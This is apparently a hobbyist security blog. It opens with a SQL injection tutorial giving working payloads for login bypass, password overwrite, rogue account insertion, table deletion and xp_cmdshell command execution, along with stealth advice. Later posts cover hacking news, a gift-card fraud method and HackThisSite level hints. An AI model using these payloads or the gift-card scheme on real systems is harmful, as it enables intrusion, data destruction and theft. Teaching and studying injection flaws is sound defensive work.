Patrick Talmadge

A major attack vector web programmers sometimes forget about is input cleansing. If user inputs are not cleansed prior to submitting the data to the SQL server attackers can submit malicious code to the server. This code can make the server return more data than it should or allow the attacker to delete entire databases.

SQL injection points occur anytime user inputs are not properly cleansed. The most common points of attack are login pages, search pages and URL strings. Attacks are not limited to these points of entry. All user input needs to be correctly cleansed to prevent SQL injection attacks.

SQL Injection Basics

SQL injections a simple in theory in which the attack finds an input that is trusted and passed to the SQL server. When the attacker finds a vulnerable input it is time to force the SQL query to return true no matter what the programmer is trying to do.

The most common way to force a SQL statement to return true is to add “‘ OR 1=1–” to a vulnerable input.

Code:
‘ OR 1=1—
Explanation:
‘ : Closes the string that the vulnerable input is looking for.
OR : a logical expression to start allow for another statement. The OR means that if the first statement fails because of the empty entry the entire statement may evaluate to true if the second statement is true.
1=1 : Since 1 will always equal 1 this expression will evaluate to true.
– : Is a comment which forces SQL to ignore everything after the – (dash dash).
Here are a few variations along the same lines as above:

Update Data in Database

The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample shows how a password can be changed if the table name and an account are know.

Code:
‘; UPDATE ‘users’ SET ‘password’ = ‘hacked’ WHERE username=‘crackable’–

The above code updates the users table where the username is crackable. SET states that the password field for the username crackable will be changed to hacked.

Insert Data into Database

Inserting data into a database is very similar to updating the table. As with the Update this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following example expects that the attacker knows the table and a general structure of the table.

Code:
‘; INSERT INTO ‘users’ (‘id’, ‘username’, ‘password’, ‘details’) VALUES (1203, ‘myaccount’, ‘mypassword’, ‘NA’)–

The above code inserts a new user into the users table. A new account is created with an id of 1203, username of myaccount, password of mypassword, and details of NA. Creating new accounts is less likely to be detected than changing the password of an existing account. If enough table information can be gained to insert a new account in the users database, it is preferred over updating an existing account. If table information cannot be obtained the next best thing would be to change a users password with an update.

Deleting Data from a Database

Deleting data from a database is very similar to updating and inserting data in a database table. As with the update and the insert this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample requires the attacker to know the table name.

Code:
‘; DELETE FROM ‘users’ –

The above code sample deletes all the data from the users table. In general an attacker would only use this delete command if they wanted to be purely destructive. This command will be discovered very quickly when users are unable to log into the website.

Remote Execution with SQL Injection (MS SQL)

SQL injections can be very powerful. This is an example of a SQL injection attack that can lead to remote execution. The default installation of MS SQL Server runs as local system, which is the same as Administrator. With the follow code stored procedures like master..xp_cmdshell can be executed which would allow and attacker to perform remote executions as if on the box.

Code:
‘; exec master..xp_cmdshell ‘ping 104.12.45.25′–

The semi colon in the statement will end the current SQL query and then allow a new SQL command. To verify that the command executed successfully, a packet sniffer can be used to sniff ICMP packets on 104.12.45.25. If packets are received at 104.12.45.25 from the SQL server the stored procedure was executed successfully.

Hacking, Security

An article in the Epoch Times (a Chinese newspaper) about a brilliant Chinese professor who has cracked her fifth encryption scheme in ten years. She and her team have cracked the SHA-1 scheme. As a result, the U.S. government and major corporations will cease using the scheme within the next few years.

Read the full article here.

Hacking, Security

I found this article on SC Magazine that reminded me of Hackers the movie because in the movie the hackers hack into the street lights so they have all green lights. Here is the article that can be found at SC Magazine.

Ericka Chickowski Jan 9 2007 18:29

Two Los Angeles municipal traffic engineers were arraigned and charged with hacking city systems to disable traffic lights, all in connection with a labor dispute.

The two men, Gabriel Murillo and Kartik Patel, were charged by the Los Angeles district attorney’s newly-formed High Technology Crimes Division. The district attorney alleged that the men illegally accessed the city’s Automated Traffic Surveillance Center last August and disconnected four signal control boxes at key intersections.

Murillo allegedly accessed the system and found a way to block other managers from fixing the changes. Prosecutors reported it took four days to repair the signals.

According to the DA’s office, the disruption occurred hours before a job action by members of the Engineers and Architects Association, a union representing employees, such as Murillo and Patel, that run the city’s traffic center.

“This amounts to sabotage and is not to be tolerated no matter what the dispute or cause,” Los Angeles District Attorney Steve Cooley said.

Hacking, Security

Earlier this month a hacker named muslix64 claimed to have cracked the AACS protection used in HD-DVD and Blu-Ray discs.Muslix64’s hack first surfaced on December 18 on YouTube, showing the decryption of an HD DVD movie, and promising more details soon.

Click the “play” button below to watch the clip:

Muslix64 posted a link to his source code at the Doom9 forum.

According to reports, the software is rough and only supports a handful of HD DVD titles, but it does seem to bypass the AACS protection. The software enables users to “backup” high-def video from HD-DVD and Blu-Ray discs to a hard drive. Playback reliably of saved files has not been confirmed.

As a movie collector I am hoping the MPAA will learn that Copy Protection is not working. It is a long shot but maybe the MPAA will look at what customers want, which is not Copy Protection, and offer open media at reasonable prices. This would allow customers to backup purchased media and freely add it to a home theater PC or iPod without cracking the Copy Protection. I know this is a long shot, but I am hopefully. I believe this will not increase piracy and will have a positive effect on profits.

Hacking

I have read that you need to know security tools if you are going to break into the IT/ Network Security field. I have found this website http://sectools.org/. The site ranks and updates the top 100 network security tools. This site seems like a great place to see what tools are on the rise and which are falling out of popularity. 

After reviewing the list I noticed that I used several of the tools. Most of the tools tend to be either free or open source. It is not realistic for me to learn and master all 100 tools. I plan to move down the list one at a time starting at 1 and go to 25. This will allow me to master the popular tools and keep up with changes in the industry.

Hacking, Security

I read a recent post that detailed how to hack gift cards. The post shocked me how insecure the gift cards are. I hope the release of posts detailing how to hack gift cards will bring about a change in the security of new cards.
You go to a store that has gift cards on display check to see if the serial number is show on the back. Some cards cover the number. If the number is not covered you write down the serial number of the cards. You then check to see if the card has been activated by checking to see if the card is valid via the phone number or internet. Once you find an active card you can then purchase things online with your new gift card.

Hacking, Security

In this level our background information is:

This time Network Security sam has saved the unencrypted level7 password in an obscurely named file saved in this very directory.In other unrelated news, Sam has set up a script that returns the output from the UNIX cal command. Here is the script:Enter the year you wish to view and hit ‘view’.

Hint: You will need more than one UNIX command to pass this level. Think about how you will enter more than one command and which commands you will need to use to list the files. You will need to change directories and list the files.

HackThisSite Levels, Hacking

In this level our background information is:

Network Security Sam has encrypted his password. The encryption system is publically available and can be accessed with this form:

You have recovered his encrypted password. It is:e39h;;6=

In this level Sam has changed several things. He has encrypted the password and we have some how gotten our hands on the encrypted password for this level. Sam has included an encryption form so you can test your password and see if it matches the encrypted password we have found.

Hint: Get yourself an ASCII table and use the encrypt form to crack the encryption. Type a sample password in the encryption form and use the results to figure out the crypto being used.

HackThisSite Levels, Hacking

In this level our background information is:

Sam has gotten wise to all the people who wrote their own forms to get the password. Rather then actually learn the password, he decided to make his email program a little more secure.

This level very similar to level 4. The method you used in level 4 may still work in level 5. All in all this level should not take you very long at all.

Hint: How can you change the email address in the script to your email address. I went with a quick and simple javascript injection method. I will post another link here after I finish my javascript injection post.

HackThisSite Levels, Hacking

In this level our background information is:

This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script:

In this level Sam has made several changes to his login script. As you can see from the background he now hardcoded the password in. But this time he created a script to email him the password because it is a long complex password. How are you going to exploit this script to get to the next level?

Hint: How can you change the email address in the script to your email address. You can do this several ways which will you find.

HackThisSite Levels, Hacking